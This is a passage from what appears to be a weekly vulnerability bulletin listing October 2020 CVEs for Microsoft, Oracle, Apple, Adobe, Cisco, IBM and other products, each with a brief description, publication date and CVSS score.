microsoft — windows_10 An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16916. 2020-10-16 7.2 CVE-2020-16935
MISC
microsoft — windows_7 A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Service Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16863
MISC
mintegral — mintegraladsdk This affects the package MintegralAdSDK before 6.6.0.0. The SDK distributed by the company contains malicious functionality that acts as a backdoor. Mintegral and their partners (advertisers) can remotely execute arbitrary code on a user device. 2020-10-19 10 CVE-2020-7745
MISC
MISC
MISC
MISC
nagios — nagios_xi Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user. 2020-10-20 9 CVE-2020-5791
MISC
onethird — onethird Local file inclusion vulnerability in OneThird CMS v1.96c and earlier allows a remote unauthenticated attacker to execute arbitrary code or obtain sensitive information via unspecified vectors. 2020-10-20 7.5 CVE-2020-5640
MISC
MISC
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 7.8 CVE-2020-14864
MISC
oracle — financial_services_analytical_applications_infrastructure Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 8.6 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H). 2020-10-21 7.8 CVE-2020-14824
MISC
oracle — flexcube_direct_banking Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 7.1 CVE-2020-14897
MISC
oracle — flexcube_direct_banking Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 7.1 CVE-2020-14890
MISC
oracle — hospitality_opera_5_property_services Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 6.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H). 2020-10-21 8.5 CVE-2020-14858
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). 2020-10-21 7.5 CVE-2020-14760
CONFIRM
MISC
oracle — one-to-one_fulfillment Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 7.8 CVE-2020-14863
MISC
oracle — peoplesoft_enterprise_scm_esupplier_connection Vulnerability in the PeopleSoft Enterprise SCM eSupplier Connection product of Oracle PeopleSoft (component: eSupplier Connection). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM eSupplier Connection. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise SCM eSupplier Connection accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise SCM eSupplier Connection accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 8.5 CVE-2020-14865
MISC
oracle — scheduler Vulnerability in the Scheduler component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Scheduler executes to compromise Scheduler. While the vulnerability is in Scheduler, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Scheduler. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 7.2 CVE-2020-14735
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 7.8 CVE-2020-14856
MISC
oracle — universal_work_queue Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3 – 12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 9 CVE-2020-14862
MISC
oracle — universal_work_queue Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Administration). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 10 CVE-2020-14855
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 10 CVE-2020-14859
MISC
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 7.5 CVE-2020-14825
MISC
MISC
MISC
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 7.5 CVE-2020-14841
MISC
MISC
MISC

Back to top

 

Medium Vulnerabilities

Primary
Vendor — Product
Description Published CVSS Score Source & Patch Info
acronis — true_image Acronis True Image 2021 fails to properly set ACLs of the C:ProgramDataAcronis directory. Because some privileged processes are executed from the C:ProgramDataAcronis, an unprivileged user can achieve arbitrary code execution with SYSTEM privileges by placing a DLL in one of several paths within C:ProgramDataAcronis. 2020-10-21 6.9 CVE-2020-10140
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24413
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24415
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24414
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24409
MISC
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24412
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24410
MISC
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds write vulnerability when handling crafted PDF files. This could result in a write past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24411
MISC
MISC
adobe — marketo_sales_insight Marketo Sales Insight plugin version 1.4355 (and earlier) is affected by a blind stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2020-10-20 4.3 CVE-2020-24416
MISC
advantech — r-seenet The R-SeeNet webpage (1.5.1 through 2.4.10) suffers from SQL injection, which allows a remote attacker to invoke queries on the database and retrieve sensitive information. 2020-10-20 5 CVE-2020-25157
MISC
apple — icloud An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2020-10-16 4.3 CVE-2020-9915
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. 2020-10-16 6.5 CVE-2020-9910
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack. 2020-10-16 4.3 CVE-2020-9952
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting. 2020-10-16 4.3 CVE-2020-9925
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection. 2020-10-16 6.8 CVE-2020-9862
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 4.3 CVE-2020-9894
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 6.8 CVE-2020-9893
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9936
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL. 2020-10-16 5 CVE-2020-9916
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipad_os A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files. 2020-10-16 4.3 CVE-2020-9968
MISC
MISC
MISC
MISC
apple — ipad_os An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group. 2020-10-16 4.3 CVE-2020-9885
MISC
MISC
MISC
MISC
apple — ipad_os An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets. 2020-10-16 5 CVE-2020-9914
MISC
MISC
apple — ipad_os A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information. 2020-10-16 4.3 CVE-2020-9976
MISC
MISC
MISC
apple — ipad_os This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service. 2020-10-16 5 CVE-2020-9917
MISC
apple — ipad_os A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination. 2020-10-16 5 CVE-2020-9931
MISC
apple — ipad_os A memory initialization issue was addressed with improved memory handling. This issue is fixed in iOS 14.0 and iPadOS 14.0. A local user may be able to read kernel memory. 2020-10-16 4.9 CVE-2020-9964
MISC
apple — ipad_os This issue was addressed with improved checks. This issue is fixed in iOS 14.0 and iPadOS 14.0, watchOS 7.0. The screen lock may not engage after the specified time period. 2020-10-16 4.6 CVE-2020-9946
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9889
MISC
MISC
MISC
MISC
apple — ipad_os An authorization issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to read sensitive location information. 2020-10-16 4.3 CVE-2020-9933
MISC
MISC
MISC
apple — ipad_os A buffer overflow issue was addressed with improved memory handling. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted USD file may lead to unexpected application termination or arbitrary code execution. 2020-10-16 6.8 CVE-2020-9878
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8. An attacker that has already achieved kernel code execution may be able to bypass kernel memory mitigations. 2020-10-16 4.3 CVE-2020-9909
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9891
MISC
MISC
MISC
MISC
apple — ipad_os A memory corruption issue was addressed by removing the vulnerable code. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A malicious application may be able to break out of its sandbox. 2020-10-16 6.8 CVE-2020-9865
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9888
MISC
MISC
MISC
MISC
apple — ipad_os An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9884
MISC
apple — ipad_os A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code. 2020-10-16 6.5 CVE-2020-9870
MISC
MISC
MISC
apple — ipad_os An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9890
MISC
MISC
MISC
MISC
apple — safari An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution. 2020-10-16 6.8 CVE-2020-9983
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy. 2020-10-16 5 CVE-2020-9911
MISC
MISC
apple — safari A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. A malicious attacker may cause Safari to suggest a password for the wrong domain. 2020-10-16 5 CVE-2020-9903
MISC
MISC
apple — safari A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9948
MISC
apple — safari A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9951
MISC
appneta — tcpreplay An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in get_l2len() that can make tcpprep crash and cause a denial of service. 2020-10-19 5 CVE-2020-24266
MISC
appneta — tcpreplay An issue was discovered in tcpreplay tcpprep v4.3.3. There is a heap buffer overflow vulnerability in MemcmpInterceptorCommon() that can make tcpprep crash and cause a denial of service. 2020-10-19 5 CVE-2020-24265
MISC
boltbrowser — bolt_browser User Interface (UI) Misrepresentation of Critical Information vulnerability in the address bar of Danyil Vasilenko’s Bolt Browser allows an attacker to obfuscate the true source of data as presented in the browser. This issue affects the Bolt Browser version 1.4 and prior versions. 2020-10-20 4.3 CVE-2020-7370
MISC
MISC
cisco — firepower_threat_defense A vulnerability in the ingress packet processing path of Cisco Firepower Threat Defense (FTD) Software for interfaces that are configured either as Inline Pair or in Passive mode could allow an unauthenticated, adjacent attacker to cause a denial of service (DoS) condition. The vulnerability is due to insufficient validation when Ethernet frames are processed. An attacker could exploit this vulnerability by sending malicious Ethernet frames through an affected device. A successful exploit could allow the attacker do either of the following: Fill the /ngfw partition on the device: A full /ngfw partition could result in administrators being unable to log in to the device (including logging in through the console port) or the device being unable to boot up correctly. Note: Manual intervention is required to recover from this situation. Customers are advised to contact the Cisco Technical Assistance Center (TAC) to help recover a device in this condition. Cause a process crash: The process crash would cause the device to reload. No manual intervention is necessary to recover the device after the reload. 2020-10-21 6.1 CVE-2020-3577
CISCO
cisco — firepower_threat_defense A vulnerability in the TCP Intercept functionality of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to bypass configured Access Control Policies (including Geolocation) and Service Polices on an affected system. The vulnerability exists because TCP Intercept is invoked when the embryonic connection limit is reached, which can cause the underlying detection engine to process the packet incorrectly. An attacker could exploit this vulnerability by sending a crafted stream of traffic that matches a policy on which TCP Intercept is configured. A successful exploit could allow the attacker to match on an incorrect policy, which could allow the traffic to be forwarded when it should be dropped. In addition, the traffic could incorrectly be dropped. 2020-10-21 4.3 CVE-2020-3565
CISCO
cisco — firepower_threat_defense A vulnerability in the ssl_inspection component of Cisco Firepower Threat Defense (FTD) Software could allow an unauthenticated, remote attacker to crash Snort instances. The vulnerability is due to insufficient input validation in the ssl_inspection component. An attacker could exploit this vulnerability by sending a malformed TLS packet through a Cisco Adaptive Security Appliance (ASA). A successful exploit could allow the attacker to crash a Snort instance, resulting in a denial of service (DoS) condition. 2020-10-21 5 CVE-2020-3317
CISCO
clamxav — clamxav An issue was discovered in ClamXAV 3 before 3.1.1. A malicious actor could use a properly signed copy of ClamXAV 2 (running with an injected malicious dylib) to communicate with ClamXAV 3’s helper tool and perform privileged operations. This occurs because of inadequate client verification in the helper tool. 2020-10-16 4.6 CVE-2020-26893
MISC
cminds — cm_download_manager The cm-download-manager plugin before 2.8.0 for WordPress allows XSS. 2020-10-21 4.3 CVE-2020-27344
MISC
MISC
dell — emc_networker Dell EMC NetWorker versions prior to 19.3.0.2 contain an incorrect privilege assignment vulnerability. A non-LDAP remote user with low privileges may exploit this vulnerability to perform ‘saveset’ related operations in an unintended manner. The vulnerability is not exploitable by users authenticated via LDAP. 2020-10-16 4 CVE-2020-26182
CONFIRM
dell — emc_networker Dell EMC NetWorker versions prior to 19.3.0.2 contain an improper authorization vulnerability. Certain remote users with low privileges may exploit this vulnerability to perform ‘nsrmmdbd’ operations in an unintended manner. 2020-10-16 4 CVE-2020-26183
CONFIRM
gitea — gitea ** DISPUTED ** The git hook feature in Gitea 1.1.0 through 1.12.5 allows for authenticated remote code execution. NOTE: The vendor has indicated this is not a vulnerability and states “This is a functionality of the software that is limited to a very limited subset of accounts. If you give someone the privilege to execute arbitrary code on your server, they can execute arbitrary code on your server. We provide very clear warnings to users around this functionality and what it provides.” 2020-10-16 6.5 CVE-2020-14144
MISC
MISC
MISC
MISC
MISC
gogs — gogs The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution. 2020-10-16 6.5 CVE-2020-15867
MISC
gopro — gpmf-parser GoPro gpmf-parser through 1.5 has a stack out-of-bounds write vulnerability in GPMF_ExpandComplexTYPE(). Parsing malicious input can result in a crash or potentially arbitrary code execution. 2020-10-19 6.8 CVE-2020-16158
MISC
MISC
huawei — mate_20_firmware HUAWEI Mate 20 versions earlier than 10.0.0.188(C00E74R3P8) have a buffer overflow vulnerability in the Bluetooth module. Due to insufficient input validation, an unauthenticated attacker may craft Bluetooth messages after successful paring, causing buffer overflow. Successful exploit may cause code execution. 2020-10-19 5.4 CVE-2020-9113
MISC
huawei — mate_30_firmware HUAWEI Mate 30 versions earlier than 10.1.0.150(C00E136R5P3) and HUAWEI P30 version earlier than 10.1.0.160(C00E160R2P11) have a use after free vulnerability. There is a condition exists that the system would reference memory after it has been freed, the attacker should trick the user into running a crafted application with common privilege, successful exploit could cause code execution. 2020-10-19 6.8 CVE-2020-9263
MISC
ibm — elastic_storage_server IBM Spectrum Scale V4.2.0.0 through V4.2.3.23 and V5.0.0.0 through V5.0.5.2 as well as IBM Elastic Storage System 6.0.0 through 6.0.1.0 could allow a local attacker to invoke a subset of ioctls on the device with invalid arguments that could crash the keneral and cause a denial of service. IBM X-Force ID: 188599. 2020-10-20 4.9 CVE-2020-4756
XF
CONFIRM
CONFIRM
ibm — resilient_security_orchestration_automation_and_response IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503. 2020-10-16 6.5 CVE-2020-4636
XF
CONFIRM
ibm — security_guardium_big_data_intelligence IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560. 2020-10-16 5 CVE-2020-4254
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 does not set the secure attribute on authorization tokens or session cookies. Attackers may be able to get the cookie values by sending a http:// link to a user or by planting this link in a site the user goes to. The cookie will be sent to the insecure link and the attacker can then obtain the cookie value by snooping the traffic. IBM X-Force ID: 188518. 2020-10-20 4.3 CVE-2020-4749
XF
CONFIRM
ibm — spectrum_scale IBM Spectrum Scale 5.0.0 through 5.0.5.2 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 188517. 2020-10-20 4.3 CVE-2020-4748
XF
CONFIRM
